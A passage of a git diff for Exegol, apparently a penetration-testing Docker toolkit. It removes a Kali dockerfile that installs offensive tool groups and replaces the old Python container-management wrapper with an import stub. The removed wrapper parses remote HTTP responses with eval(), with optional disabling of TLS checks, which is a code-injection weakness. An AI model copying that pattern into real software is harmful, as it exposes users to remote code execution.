install_web_tools -#RUN /root/sources/install.sh install_c2_tools -#RUN /root/sources/install.sh install_services_tools -#RUN /root/sources/install.sh install_ad_tools -#RUN /root/sources/install.sh install_mobile_tools -#RUN /root/sources/install.sh install_iot_tools -#RUN /root/sources/install.sh install_rfid_tools -#RUN /root/sources/install.sh install_sdr_tools -#RUN /root/sources/install.sh install_network_tools -#RUN /root/sources/install.sh install_wifi_tools -#RUN /root/sources/install.sh install_forensic_tools -#RUN /root/sources/install.sh install_cloud_tools -#RUN /root/sources/install.sh install_steganography_tools -#RUN /root/sources/install.sh install_reverse_tools -#RUN /root/sources/install.sh install_GUI_tools -#RUN /root/sources/install.sh install_code_analysis_tools - -RUN /root/sources/install.sh install_resources -RUN /root/sources/install.sh install_clean - -RUN rm -rf /root/sources - -WORKDIR /data -#CMD ["/bin/zsh"] diff --git a/dockerfiles/web.dockerfile b/dockerfiles/web.dockerfile deleted file mode 100644 index 8a9e4c48..00000000 --- a/dockerfiles/web.dockerfile +++ /dev/null @@ -1,42 +0,0 @@ -# Author: Charlie BROMBERG (Shutdown - @_nwodtuhs) - -FROM kalilinux/kali-rolling - -ADD sources /root/sources -RUN chmod +x /root/sources/install.sh - -RUN /root/sources/install.sh install_base - -# WARNING: install_most_used_tools can't be used with other functions other than: install_base, install_resources, install_clean -#RUN /root/sources/install.sh install_most_used_tools - -# WARNING: the following installs (except: install_base, install_resources, install_clean) can't be used with install_most_used_tools -# this is a temporary limitation -RUN /root/sources/install.sh install_misc_tools -RUN /root/sources/install.sh install_wordlists_tools -RUN /root/sources/install.sh install_cracking_tools -RUN /root/sources/install.sh install_osint_tools -RUN /root/sources/install.sh install_web_tools -#RUN /root/sources/install.sh install_c2_tools -#RUN 
/root/sources/install.sh install_services_tools -#RUN /root/sources/install.sh install_ad_tools -#RUN /root/sources/install.sh install_mobile_tools -#RUN /root/sources/install.sh install_iot_tools -#RUN /root/sources/install.sh install_rfid_tools -#RUN /root/sources/install.sh install_sdr_tools -#RUN /root/sources/install.sh install_network_tools -#RUN /root/sources/install.sh install_wifi_tools -#RUN /root/sources/install.sh install_forensic_tools -#RUN /root/sources/install.sh install_cloud_tools -#RUN /root/sources/install.sh install_steganography_tools -#RUN /root/sources/install.sh install_reverse_tools -#RUN /root/sources/install.sh install_GUI_tools -RUN /root/sources/install.sh install_code_analysis_tools - -RUN /root/sources/install.sh install_resources -RUN /root/sources/install.sh install_clean - -RUN rm -rf /root/sources - -WORKDIR /data -#CMD ["/bin/zsh"] diff --git a/exegol-docker-build b/exegol-docker-build new file mode 160000 index 00000000..07fab03c --- /dev/null +++ b/exegol-docker-build @@ -0,0 +1 @@ +Subproject commit 07fab03c7e502f4ebf7e12da3cb5d8178dba10e0 diff --git a/exegol-resources b/exegol-resources new file mode 160000 index 00000000..91bcf5bb --- /dev/null +++ b/exegol-resources @@ -0,0 +1 @@ +Subproject commit 91bcf5bbb5cf889b1103220ef5d9b7f7993b383b diff --git a/exegol.py b/exegol.py index 6df9eb16..1533c80b 100755 --- a/exegol.py +++ b/exegol.py @@ -1,1137 +1,12 @@ #!/usr/bin/env python3 # -*- coding: utf-8 -*- +try: + from exegol.manager.ExegolController import main +except ModuleNotFoundError as e: + print("Mandatory dependencies are missing:", e) + print("Please install them with pip3 install -r requirements.txt") + exit(1) -import argparse -import json -import os -import shutil -import subprocess -import docker -import requests -from dateutil import parser -from rich.table import Table -from rich import box -from rich.console import Console - -VERSION = "3.1.12.dev" - -''' -# TODO : -- faire plus d'affichage de debug -- dans 
l'epilog, donner des exemples pour les devs et/ou faire une partie advanced usage dans le wiki, référencer le wiki dans le readme -- vérifier que le help est clair (dans le help, bien expliquer que le container-tag est un identifiant unique pour le container) -- nettoyer les variables et fonctions qui ne sont plus utilisées -- remove le default suivant ~l507 + ~l534 quand j'aurais dockertag == branch, la stable pointe vers master là : if dockertag == "": dockertag = "stable" (rename de master et stable vers main ?) -- revoir la gestion/montage des ressources, peut-être un container différent ? -- tester un exegol -m sources install et de nommer l'image sur un nom existant, voir le comportement -- l640 corriger default_git_branch -- edit --device option so that it can be called multiple times to share multiple devices, need to adapt the info_containers -- remove the eval() calls -''' - - -class Logger: - def __init__(self, verbosity=0, quiet=False): - self.verbosity = verbosity - self.quiet = quiet - - def debug(self, message): - if self.verbosity == 2: - console.print("{}[DEBUG]{} {}".format("[yellow3]", "[/yellow3]", message), highlight=False) - - def verbose(self, message): - if self.verbosity >= 1: - console.print("{}[VERBOSE]{} {}".format("[blue]", "[/blue]", message), highlight=False) - - def info(self, message): - if not self.quiet: - console.print("{}[*]{} {}".format("[bold blue]", "[/bold blue]", message), highlight=False) - - def success(self, message): - if not self.quiet: - console.print("{}[+]{} {}".format("[bold green]", "[/bold green]", message), highlight=False) - - def warning(self, message): - if not self.quiet: - console.print("{}[-]{} {}".format("[bold orange3]", "[/bold orange3]", message), highlight=False) - - def error(self, message): - if not self.quiet: - console.print("{}[!]{} {}".format("[bold red]", "[/bold red]", message), highlight=False) - - def raw(self, message): - if not self.quiet: - console.print(message,end='') - - -def 
get_options(): - description = "This Python script is a wrapper for Exegol. It can be used to easily manage Exegol on your machine." - - examples = { - "install (↓ ~15GB max)": "exegol install", - "check image updates": "exegol info", - "get a shell\t": "exegol start", - "run as daemon\t": "exegol exec -e bloodhound", - "get a tmux shell": "exegol --shell tmux start", - "use wifi/bluetooth": "exegol --privileged start", - "use a Proxmark": "exegol --device /dev/ttyACM0 start", - "use a LOGITacker": "exegol --device /dev/ttyACM0 start", - "use an ACR122u": "exegol --device /dev/bus/usb/ start", - "use an HackRF One": "exegol --device /dev/bus/usb/ start", - "use an Crazyradio PA": "exegol --device /dev/bus/usb/ start", - } - - epilog = "{}Examples:{}\n".format(GREEN, END) - for example in examples.keys(): - epilog += " {}\t{}\n".format(example, examples[example]) - - actions = { - "start": "automatically start, resume, create or enter an Exegol container", - "stop": "stop an Exegol container in a saved state", - "install": "install Exegol image (build or pull depending on the chosen install --mode)", - "update": "update Exegol image (build or pull depending on the chosen update --mode)", - "remove": "remove Exegol image(s) and/or container(s)", - "exec": "execute a command on an Exegol container", - "info": "print info on containers and local & remote images (name, size, state, ...)", - "version": "print current version", - } - - actions_help = "" - for action in actions.keys(): - actions_help += "{}\t\t{}\n".format(action, actions[action]) - - modes = { - "release": "(default) downloads a pre-built image (from DockerHub) (faster)", - "sources": "builds from the local sources in {} (pull from GitHub then docker build, local edits won't be overwritten)".format( - EXEGOL_PATH - ) - } - - modes_help = "" - for mode in modes.keys(): - modes_help += "{}\t\t{}\n".format(mode, modes[mode]) - - parser = argparse.ArgumentParser( - description=description, - epilog=epilog, - 
formatter_class=argparse.RawTextHelpFormatter, - ) - - # Required arguments - parser._positionals.title = "{}Required arguments{}".format("\033[1;32m", END) - parser.add_argument("action", choices=actions.keys(), help=actions_help) - parser.add_argument( - "-k", - "--insecure", - dest="verify", - action="store_false", - default=True, - required=False, - help="Allow insecure server connections for web requests (default: False)", - ) - - # Optional arguments - parser._optionals.title = "{}Optional arguments{}".format(BLUE, END) - logging = parser.add_mutually_exclusive_group() - logging.add_argument( - "-v", - "--verbose", - dest="verbosity", - action="count", - default=0, - help="verbosity level (-v for verbose, -vv for debug)", - ) - logging.add_argument( - "-q", - "--quiet", - dest="quiet", - action="store_true", - default=False, - help="show no information at all", - ) - - # Install/update options - install_update = parser.add_argument_group( - "{}Install/update options{}".format(BLUE, END) - ) - install_update.add_argument( - "-m", - "--mode", - dest="mode", - action="store", - choices=modes.keys(), - default="release", - help=modes_help, - ) - - # Default start options - default_start = parser.add_argument_group( - "{}Default start options{}".format(BLUE, END), - description='The following options are enabled by default. They can all be disabled with the advanced option "--no-default". 
They can then be enabled back separately, for example "exegol --no-default --X11 start"', - ) - default_start.add_argument( - "-x", - "--X11", - dest="X11", - action="store_true", - help="enable display sharing to run GUI-based applications", - ) - default_start.add_argument( - "--host-timezones", - dest="host_timezones", - action="store_true", - help="let the container share the host's timezones configuration", - ) - default_start.add_argument( - "--host-network", - dest="host_network", - action="store_true", - help="let the container share the host's networking namespace (the container shares the same interfaces and has the same adresses, needed for mitm6)", - ) - default_start.add_argument( - "--bind-resources", - dest="bind_resources", - action="store_true", - help="mount the /opt/resources of the container in a subdirectory of host\'s {}".format(SHARED_RESOURCES) - ) - default_start.add_argument( - "-s", - "--shell", - dest="shell", - action="store", - choices={"zsh", "bash", "tmux"}, - default="zsh", - help="select shell to start when entering Exegol (Default: zsh)", - ) - - default_start.add_argument( - "-e", - "--exec", - dest="exec", - action="store", - help="execute a command on exegol container", - ) - - - # Advanced start options - advanced_start = parser.add_argument_group( - "{}Advanced start/stop/reset options{}".format(BLUE, END) - ) - advanced_start.add_argument( - "-t", - "--container-tag", - dest="containertag", - action="store", - help="tag to use in the container name", - ) - advanced_start.add_argument( - "--no-default", - dest="no_default", - action="store_true", - default=False, - help="disable the default start options (e.g. --X11, --host-network)", - ) - advanced_start.add_argument( - "--privileged", - dest="privileged", - action="store_true", - default=False, - help="(dangerous) give extended privileges at the container creation (e.g. 
needed to mount things, to use wifi or bluetooth)", - ) - advanced_start.add_argument( - "-d", - "--device", - dest="device", - action="store", - help="add a host device at the container creation", - ) - advanced_start.add_argument( - "-c", - "--custom-options", - dest="custom_options", - action="store", - default="", - help="specify custom options for the container creation", - ) - advanced_start.add_argument( - "-cwd", - "--cwd-mount", - dest="mount_current_dir", - action="store_true", - help="mount current dir to container's /workspace", - ) - - options = parser.parse_args() - - if not options.no_default: - options.X11 = True - options.host_network = True - options.bind_resources = True - options.action = options.action.replace("-", "") - if options.action == "update": - options.action = "install" - return options - - -def container_exists(containertag): - containers = client.containers.list(all=True, filters={"name": "exegol-" + containertag}) - for container in containers: - if not container.name == "exegol-" + containertag: - containers.remove(container) - logger.debug("Containers with name {}: {}".format("exegol-" + containertag, str(len(containers)))) - if len(containers) > 1: - logger.error("Something's wrong, you shouldn't have multiple containers with the same name...") - exit(1) - else: - return bool(len(containers)) - - -def was_created_with_gui(container): - logger.debug( - "Looking for the {} in the container {}".format("'DISPLAY' environment variable", container.attrs["Name"])) - container_info = container.attrs - for var in container_info["Config"]["Env"]: - if "DISPLAY" in var: - return True - return False - - -def was_created_with_privileged(container): - logger.debug("Looking for the {} in the container {}".format("'Privileged' attribute", container.attrs["Name"])) - return container.attrs["HostConfig"]["Privileged"] - - -def was_created_with_device(container): - logger.debug("Looking for the {} in the container {}".format("'Devices' attribute", 
container.attrs["Name"])) - if container.attrs["HostConfig"]["Devices"]: - return container.attrs["HostConfig"]["Devices"][0]["PathOnHost"] - else: - return False - - -def was_created_with_host_networking(container): - logger.debug("Looking for the {} in the container {}".format("'host' value in the 'Networks' attribute", - container.attrs["Name"])) - return ("host" in container.attrs["NetworkSettings"]["Networks"]) - - -def container_analysis(container): - if was_created_with_device(container): - if options.device and options.device != was_created_with_device(container): - logger.warning( - "Container was created with another shared device ({}), you need to reset it and start it with the -d/--device option, and the name of the device, for it to be taken into account".format( - was_created_with_device(container))) - else: - logger.verbose( - "Container was created with host device ({}) sharing".format(was_created_with_device(container))) - elif options.device: - logger.warning( - "Container was created with no device sharing, you need to reset it and start it with the -d/--device option, and the name of the device, for it to be taken into account" - ) - - if was_created_with_privileged(container): - logger.warning("Container was given extended privileges at its creation") - elif options.privileged: - logger.warning( - "Container was not given extended privileges at its creation, you need to reset it and start it with the -p/--privileged option for it to be taken into account" - ) - - if was_created_with_host_networking(container): - logger.verbose("Container was created with host networking") - elif options.host_network: - logger.warning( - "Container was not created with host networking, you need to reset it and start it with the --host-network (or without --no-default) option for it to be taken into account" - ) - - if was_created_with_gui(container): - logger.verbose("Container was created with display sharing") - elif options.X11: - logger.warning( - "Container 
was not created with display sharing, you need to reset it and start it with the -x/--X11 " - "option (or without --no-default) for it to be taken into account " - ) - - -def container_creation_options(containertag): - base_options = "" - advanced_options = "" - if options.X11: - logger.verbose("Enabling display sharing") - advanced_options += " --env DISPLAY=unix{}".format(os.getenv("DISPLAY")) - advanced_options += " --volume /tmp/.X11-unix:/tmp/.X11-unix" - advanced_options += ' --env="QT_X11_NO_MITSHM=1"' - if options.host_timezones: - logger.verbose("Enabling host timezones") - advanced_options += " --volume /etc/timezone:/etc/timezone:ro" - advanced_options += " --volume /etc/localtime:/etc/localtime:ro" - if options.host_network: - logger.verbose("Enabling host networking") - advanced_options += " --network host" - if options.bind_resources: - # TODO: find a solution for this, if two containers have differents resources, when I boot container A and B, B's resources will be overwriten with A's - logger.verbose("Sharing /opt/resources (container) ↔ {} (host)".format(SHARED_RESOURCES)) - if not os.path.isdir(SHARED_RESOURCES): - logger.debug("Host directory {} doesn\'t exist. 
Creating it...".format(SHARED_RESOURCES)) - os.mkdir(SHARED_RESOURCES) - advanced_options += ' --mount ' - advanced_options += 'type=volume,' - advanced_options += 'dst=/opt/resources,' - advanced_options += 'volume-driver=local,' - advanced_options += 'volume-opt=type=none,' - advanced_options += 'volume-opt=o=bind,' - advanced_options += 'volume-opt=device={}'.format(SHARED_RESOURCES) - if options.privileged: - logger.warning("Enabling extended privileges") - advanced_options += " --privileged" - if options.device: - logger.verbose("Enabling host device ({}) sharing".format(options.device)) - advanced_options += " --device {}".format(options.device) - if options.mount_current_dir: - logger.verbose("Sharing /workspace (container) ↔ {} (host)".format(os.getcwd())) - advanced_options += " --volume {}:/workspace".format(os.getcwd()) - if options.custom_options: - logger.verbose("Specifying custom options: {}".format(options.custom_options)) - advanced_options += " " + options.custom_options - base_options += " --interactive" - base_options += " --tty" - # base_options += ' --detach' - base_options += " --volume {}:/data".format(SHARED_DATA_VOLUMES + "/" + containertag) - base_options += " --name {}".format("exegol-" + containertag) - base_options += " --hostname {}".format("exegol-" + containertag) - return base_options, advanced_options - - -# Exec command on host with output being printed with logger.debug() or logger.error() -def exec_popen(command): - cmd = command.split() - logger.debug("Running command on host with subprocess.Popen(): {}".format(str(cmd))) - output = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE) - stdout, stderr = output.communicate() - if stdout is not None and not stdout == b"": - for line in stdout.decode().strip().splitlines(): - logger.debug("{}(cmd stdout){}\t{}".format(BLUE, END, line)) - if stderr is not None and not stderr == b"": - for line in stderr.decode().strip().splitlines(): - logger.error("{}(cmd 
stderr){}\t{}".format(RED, END, line)) - - -def readable_size(size, precision=1): - # https://stackoverflow.com/a/32009595 - suffixes = ["B", "KB", "MB", "GB", "TB"] - suffix_index = 0 - while size > 1024 and suffix_index < 4: - suffix_index += 1 # increment the index of the suffix - size = size / 1024.0 # apply the division - return "%.*f%s" % (precision, size, suffixes[suffix_index]) - - -# Exec command on host with output being printed without treatment -def exec_system(command): - logger.debug("Running on host with os.system(): {}".format(command)) - os.system(command) - - -def select_containertag(local_git_branch): - logger.info("No container tag (-t/--container-tag) supplied") - - info_containers() - - # default to local git branch or master if none - if not local_git_branch: - default_containertag = "master" - else: - default_containertag = local_git_branch - - # fetching containers - containers = client.containers.list(all=True, filters={"name": "exegol-"}) - len_containers = len(containers) - logger.debug("Available local containers: {}".format(len_containers)) - - # default to last created container - # TODO: need to find a way to default to the latest "used" container instead of "created" - logger.debug("Fetching 'FinishedAt' attribute for each container") - last_used_container_tag = "" - if not len_containers == 0: - finished_at = "" - for container in containers: - logger.debug("└── " + str(container.attrs["Name"]) + " → " + str(container.attrs["State"]["FinishedAt"])) - this_finished_at = parser.parse(container.attrs["State"]["FinishedAt"]) - if finished_at: - if this_finished_at >= finished_at: - finished_at = this_finished_at - last_used_container_tag = container.attrs["Name"].replace('/exegol-', '') - else: - last_used_container_tag = container.attrs["Name"].replace('/exegol-', '') - finished_at = this_finished_at - logger.debug("Last created container: {}".format(last_used_container_tag)) - if last_used_container_tag: - default_containertag = 
last_used_container_tag - - # default to container that has the local dir mounted as volume - logger.debug("Fetching volumes for each container") - cwd_in_vol_container = "" - if not len_containers == 0: - for container in containers: - volumes = [] - if container.attrs["HostConfig"].get("Binds"): - for bind in container.attrs["HostConfig"]["Binds"]: - volumes.append(bind.split(":")[0]) - if container.attrs["HostConfig"].get("Mounts"): - for mount in container.attrs["HostConfig"]["Mounts"]: - volumes.append(mount["VolumeOptions"]["DriverConfig"]["Options"]["device"]) - logger.debug("└── " + str(container.attrs["Name"]) + " → " + str(volumes)) - if os.getcwd() in volumes: - cwd_in_vol_container = container.attrs["Name"].replace('/exegol-', '') - logger.debug("Current dir is in volumes of container: {}".format(cwd_in_vol_container)) - if cwd_in_vol_container: - default_containertag = cwd_in_vol_container - - containertags = [] - if not len_containers == 0: - for container in containers: - containertags.append(container.attrs["Name"].replace('/exegol-', '')) - - containertag = input( - "{}[?]{} What container do you want to {} [default: {}]? ".format(BOLD_BLUE, END, options.action, - default_containertag)) - - if not containertag: - options.containertag = default_containertag - else: - options.containertag = containertag - - -def start(): - global LOOP_PREVENTION - len_images = len(client.images.list(IMAGE_NAME, filters={"dangling": False})) - if not len_images == 0: - if LOOP_PREVENTION == "": - logger.success("{} Exegol images exist".format(len_images)) - if not options.containertag: - len_containers = len(client.containers.list(all=True, filters={"name": "exegol-"})) - if len_containers > 0: - select_containertag(LOCAL_GIT_BRANCH) - else: - # no container exists, let's set the containertag and we'll bypass the next condition - # and go directly to the else, i.e. 
the container creation - # default to local git branch or master if none - if not LOCAL_GIT_BRANCH: - options.containertag = "master" - else: - options.containertag = LOCAL_GIT_BRANCH - if container_exists(options.containertag): - if LOOP_PREVENTION == "" or LOOP_PREVENTION == "create": - logger.success("Container exists") - containers = client.containers.list(all=True, filters={"name": "exegol-" + options.containertag}) - for container in containers: - if not container.name == "exegol-" + options.containertag: - containers.remove(container) - container = containers[0] - if container.attrs["State"]["Status"] == "running": - if LOOP_PREVENTION == "exec": - logger.debug("Loop prevention triggered") - logger.error("Something went wrong...") - else: - logger.success("Container is up") - container_analysis(container) - if was_created_with_gui(container): - logger.info("Running xhost command for display sharing") - exec_popen( - "xhost +local:{}".format( - client.api.inspect_container("exegol-" + options.containertag)["Config"][ - "Hostname" - ] - ) - ) - if options.exec is None: - logger.info("Entering Exegol") - exec_system("docker exec -ti {} {}".format("exegol-" + options.containertag, options.shell)) - else: - logger.info("Executing command on Exegol") - # Using 'zsh source /opt/.zsh_aliases; eval cmd' to interpret alias commands on a non-interactive shell - cmd = "zsh -c \"source /opt/.zsh_aliases; eval \'{}\'\"".format(options.exec.replace("\"", "\\\"").replace("\'", "\\\'")) - logger.debug(cmd) - logs_stream = container.exec_run(cmd, detach=False, stream=True) - try: - for log in logs_stream[1]: - logger.raw(log.decode("utf-8")) - except KeyboardInterrupt: - logger.info("Detaching process logging") - logger.warning("Exiting this command do NOT stop the process in the container") - LOOP_PREVENTION = "exec" - else: - if LOOP_PREVENTION == "start": - logger.debug("Loop prevention triggered") - logger.error("Something went wrong...") - else: - 
logger.warning("Container is down") - logger.info("Starting the container") - exec_popen("docker start {}".format("exegol-" + options.containertag)) - LOOP_PREVENTION = "start" - start() - else: - if LOOP_PREVENTION == "create": - logger.debug("Loop prevention triggered") - logger.error("Something went wrong...") - else: - logger.warning("Container does not exist") - info_images() - if LOCAL_GIT_BRANCH == "master": # TODO: fix this crap when I'll have branch names that are equal to docker tags - default_dockertag = "stable" - else: - default_dockertag = LOCAL_GIT_BRANCH - imagetag = input( - "{}[?]{} What image do you want the container to create to be based upon [default: {}]? ".format( - BOLD_BLUE, END, default_dockertag)) - if not imagetag: - imagetag = default_dockertag - if client.images.list(IMAGE_NAME + ":" + imagetag): - info_containers() - if options.containertag: - default_containertag = options.containertag - elif not container_exists(imagetag): - default_containertag = imagetag - else: - logger.error(f"Something's wrong. Please create a detailed issue with everything you did and are trying to do (https://github.com/ShutdownRepo/Exegol/issues)") - # When running start without supplying a container tag, there are multiple scenarios - # 1. if >= 1 container(s) exist(s), one will be chosen to start - # 2. else, a container is created, either using a supplied tag or using the imagetag - # The user shouldn't end up here. - client.containers.list(all=True, filters={"name": "exegol-"}) - containertag = input( - "{}[?]{} What unique tag do you want to name your container with (one not in list above) [default: {}]? 
".format( - BOLD_BLUE, END, default_containertag)) - if containertag == "": - containertag = default_containertag - options.containertag = containertag - logger.info("Creating the container") - logger.debug("{} container based on the {} image".format("exegol-" + containertag, - IMAGE_NAME + ":" + imagetag)) - base_options, advanced_options = container_creation_options(options.containertag) - exec_popen("docker create {} {} {}:{}".format(base_options, advanced_options, IMAGE_NAME, imagetag)) - LOOP_PREVENTION = "create" - start() - else: - logger.warning("Image {} does not exist. You must supply a tag from the list above.".format( - IMAGE_NAME + ":" + imagetag)) - else: - if LOOP_PREVENTION == "install": - logger.debug("Loop prevention triggered") - logger.error("Something went wrong...") - else: - logger.warning("Exegol image does not exist, you must install it first") - confirmation = input( - "{}[?]{} Do you wish to install it now (↓ ~6GB)? [y/N] ".format( - BOLD_ORANGE, END - ) - ) - if confirmation == "y" or confirmation == "yes" or confirmation == "Y": - install() - LOOP_PREVENTION = "install" - start() - - -def stop(): - if not options.containertag: - select_containertag(LOCAL_GIT_BRANCH) - containers = client.containers.list(all=True, filters={"name": "exegol-" + options.containertag}) - for container in containers: - if not container.name == "exegol-" + options.containertag: - containers.remove(container) - container = containers[0] - if container.attrs["State"]["Status"] == "running": - logger.info("Container is up") - logger.info("Stopping container") - exec_popen("docker stop --time 3 {}".format("exegol-" + options.containertag)) - containers = client.containers.list(all=True, filters={"name": "exegol-" + options.containertag}) - for container in containers: - if not container.name == "exegol-" + options.containertag: - containers.remove(container) - container = containers[0] - if container.attrs["State"]["Status"] == "running": - logger.error("Container 
is still up, something went wrong...") - else: - logger.success("Container is down") - else: - logger.success("Container is down") - - -def remove_container(): - if not options.containertag: - select_containertag(LOCAL_GIT_BRANCH) - if container_exists(options.containertag): - logger.info("Container exists") - stop() - logger.info("Deleting container") - exec_popen("docker rm {}".format("exegol-" + options.containertag)) - if container_exists(options.containertag): - logger.error("Something went wrong...") - else: - logger.success("Container does not exist anymore") - else: - logger.success("Container does not exist") - logger.info("Cleaning unused host directories (resources and empty data)") - if os.path.isdir(SHARED_RESOURCES): - logger.verbose("Host directory {} exists. Removing it...".format(SHARED_RESOURCES)) - try: - shutil.rmtree(SHARED_RESOURCES) - except PermissionError: - logger.warning("I don't have the rights to remove {}".format(SHARED_RESOURCES)) - except: - logger.error("Something else went wrong") - if os.path.isdir(SHARED_DATA_VOLUMES + "/" + options.containertag): - if len(os.listdir(SHARED_DATA_VOLUMES + "/" + options.containertag)) == 0: - logger.verbose("Host directory {} exists and is empty. Removing...".format( - SHARED_DATA_VOLUMES + "/" + options.containertag)) - try: - shutil.rmtree(SHARED_DATA_VOLUMES + "/" + options.containertag) - except PermissionError: - logger.warning("I don't have the rights to remove {} (do it yourself)".format( - SHARED_DATA_VOLUMES + "/" + options.containertag)) - except: - logger.error("Something else went wrong") - - -def install(): - info_images() - if options.mode == "release": - if LOCAL_GIT_BRANCH == "master": # TODO: fix this crap when I'll have branch names that are equal to docker tags - default_dockertag = "stable" - else: - default_dockertag = LOCAL_GIT_BRANCH - dockertag = input( - "{}[?]{} What remote image (tag) do you want to install/update [default: {}]? 
".format(BOLD_BLUE, END, - default_dockertag)) - if dockertag == "": - dockertag = default_dockertag - logger.debug("Fetching DockerHub images tags") - remote_image_tags = [] - remote_images_request = requests.get(url="https://hub.docker.com/v2/repositories/{}/tags".format(IMAGE_NAME), verify=options.verify) - for image in \ - eval( - remote_images_request.text.replace("true", "True").replace("false", "False").replace("null", '""'))[ - "results"]: - remote_image_tags.append(image["name"]) - if dockertag not in remote_image_tags: - logger.warning("The supplied tag doesn't exist. You must use one from the previous list") - else: - logger.info("Pulling sources from GitHub (local changes won't be overwritten)") - exec_system("git -C {} pull origin --rebase {}".format(EXEGOL_PATH, LOCAL_GIT_BRANCH)) - logger.info("Pulling {} from DockerHub".format(IMAGE_NAME + ":" + dockertag)) - exec_system("docker pull {}:{}".format(IMAGE_NAME, dockertag)) - elif options.mode == "sources": - logger.debug("Fetching available GitHub branches") - branches_request = requests.get(url="https://api.github.com/repos/ShutdownRepo/Exegol/branches", verify=options.verify) - branches = eval(branches_request.text.replace("true", "True").replace("false", "False").replace("null", '""')) - logger.info("Available GitHub branches") - for branch in branches: - logger.info(" • {}".format(branch["name"])) - default_branch = LOCAL_GIT_BRANCH - branch = input( - "{}[?]{} What branch do you want the code to be based upon [default: {}]? ".format(BOLD_BLUE, END, - default_branch)) - if branch == "": - branch = default_branch - branch_in_branches = False - for b in branches: - if branch == b["name"]: - branch_in_branches = True - if not branch_in_branches: - logger.warning("The supplied branch doesn't exist. 
You must use one from the previous list") - else: - logger.info("Pulling sources from GitHub (local changes won't be overwritten)") - # TODO: not sure the following cmd is needed : exec_system("git -C {} checkout {}".format(EXEGOL_PATH, branch)) - exec_system("git -C {} pull origin {}".format(EXEGOL_PATH, branch)) - if branch == "master": - default_imagetag = "stable" - else: - default_imagetag = branch - imagetag = input( - "{}[?]{} What tag do you want to give to your Exegol image [default: {}]? ".format(BOLD_BLUE, END, - default_imagetag)) - if not imagetag: - imagetag = default_imagetag - logger.info("Building Exegol image {} from sources".format(IMAGE_NAME + ":" + imagetag)) - exec_system( - "docker build --no-cache --tag {}:{} {} | tee {}/.build.log".format( - IMAGE_NAME, imagetag, EXEGOL_PATH, EXEGOL_PATH - ) - ) - - -def remove_image(): - len_images = len(client.images.list(IMAGE_NAME, filters={"dangling": False})) - logger.info("Available local images: {}".format(len_images)) - if not len_images == 0: - info_images() - imagetag = input("{}[?]{} What image do you want to remove (give tag)? ".format(BOLD_BLUE, END)) - if not client.images.list(IMAGE_NAME + ":" + imagetag): - logger.warning("Image {} does not exist. You must supply a tag from the list above.".format( - IMAGE_NAME + ":" + imagetag)) - else: - logger.warning( - "About to remove docker Image {}".format(IMAGE_NAME + ":" + imagetag) - ) - confirmation = input( - "{}[?]{} Are you sure you want to do this? 
[y/N] ".format(BOLD_ORANGE, END) - ) - if confirmation == "y" or confirmation == "yes" or confirmation == "Y": - logger.info("Deletion confirmed, proceeding") - logger.info("Deleting image {}".format(IMAGE_NAME + ":" + imagetag)) - exec_system("docker image rm {}".format(IMAGE_NAME + ":" + imagetag)) - if client.images.list(IMAGE_NAME + ":" + imagetag): - logger.error("Exegol image is still here, something is wrong...") - else: - logger.success("Exegol image has been successfully removed") - else: - logger.info("Deletion canceled") - else: - logger.info("No Exegol image here, ya messin with me?") - - -def remove(): - # TODO: this needs to be improved to have the possibility to remove files, networks and so on related to Exegol, - # and improve for simultaneous multiple removals - to_remove = input("{}[?]{} Do you want to remove container(s) or image(s) [C/i]? ".format(BOLD_BLUE, END)) - if to_remove.lower() == "c" or not to_remove: - remove_container() - elif to_remove.lower() == "i": - remove_image() - else: - logger.warning("Invalid choice") - - -def info_images(): - images = [] - logger.info("Available images") - remote_images = {} - logger.debug("Fetching remote image tags, digests and sizes") - try: - remote_images_request = requests.get(url="https://hub.docker.com/v2/repositories/{}/tags".format(IMAGE_NAME), timeout=(5, 10), verify=options.verify) - remote_images_list = json.loads(remote_images_request.text) - for image in remote_images_list["results"]: - tag = image["name"] - digest = image["images"][0]["digest"] - compressed_size = readable_size(image["full_size"]) - logger.debug("└── {} → {}...".format(tag, digest[:32])) - remote_images[digest] = {"tag": tag, "compressed_size": compressed_size} - notinstalled_remote_images = remote_images - logger.debug("Fetching local image tags, digests (and other attributes)") - local_images_list = client.images.list(IMAGE_NAME, filters={"dangling": False}) - for image in local_images_list: - id = 
image.attrs["Id"].split(":")[1][:12] - if not image.attrs["RepoTags"]: - # TODO: investigate this, print those images as "layers" - # these are layers for other images - real_size = readable_size(image.attrs["Size"]) - digest = image.attrs["Id"].replace("sha256:", "") - images.append([id, "", real_size, "local layer"]) - else: - name, tag = image.attrs["RepoTags"][0].split(':') - real_size = readable_size(image.attrs["Size"]) - - if image.attrs["RepoDigests"]: # If true, the image was pulled instead of built - digest = image.attrs["RepoDigests"][0].replace("{}@".format(IMAGE_NAME), "") - - logger.debug("└── {} → {}...".format(tag, digest[:32])) - if digest in remote_images.keys(): - images.append([id, tag, real_size, "remote ({}, {})".format("[green]up to date[/green]", - remote_images[digest][ - "compressed_size"])]) - notinstalled_remote_images.pop(digest) - else: - for key in remote_images: - if remote_images[key]["tag"] == tag: - remote_digest = key - break - else: # This means the image was pulled but it doesn't exist anymore on DockerHub - remote_digest = "" - if remote_digest: - compressed_size = remote_images[remote_digest]["compressed_size"] - images.append([id, tag, real_size, - "remote ({}, {})".format("[orange3]deprecated[/orange3]", compressed_size)]) - notinstalled_remote_images.pop(remote_digest) - else: - images.append([id, tag, real_size, "remote ({})".format("[bright_black]discontinued[" - "/bright_black]")]) - else: - images.append([id, tag, real_size, "local image"]) - for uninstalled_remote_image in notinstalled_remote_images.items(): - tag = uninstalled_remote_image[1]["tag"] - compressed_size = uninstalled_remote_image[1]["compressed_size"] - id = uninstalled_remote_image[0].split(":")[1][:12] - images.append([id, tag, "[bright_black]N/A[/bright_black]", - "remote ({}, {})".format("[yellow3]not installed[/yellow3]", compressed_size)]) - images = sorted(images, key=lambda k: k[1]) - if options.verbosity == 0: - table = Table(show_header=True, 
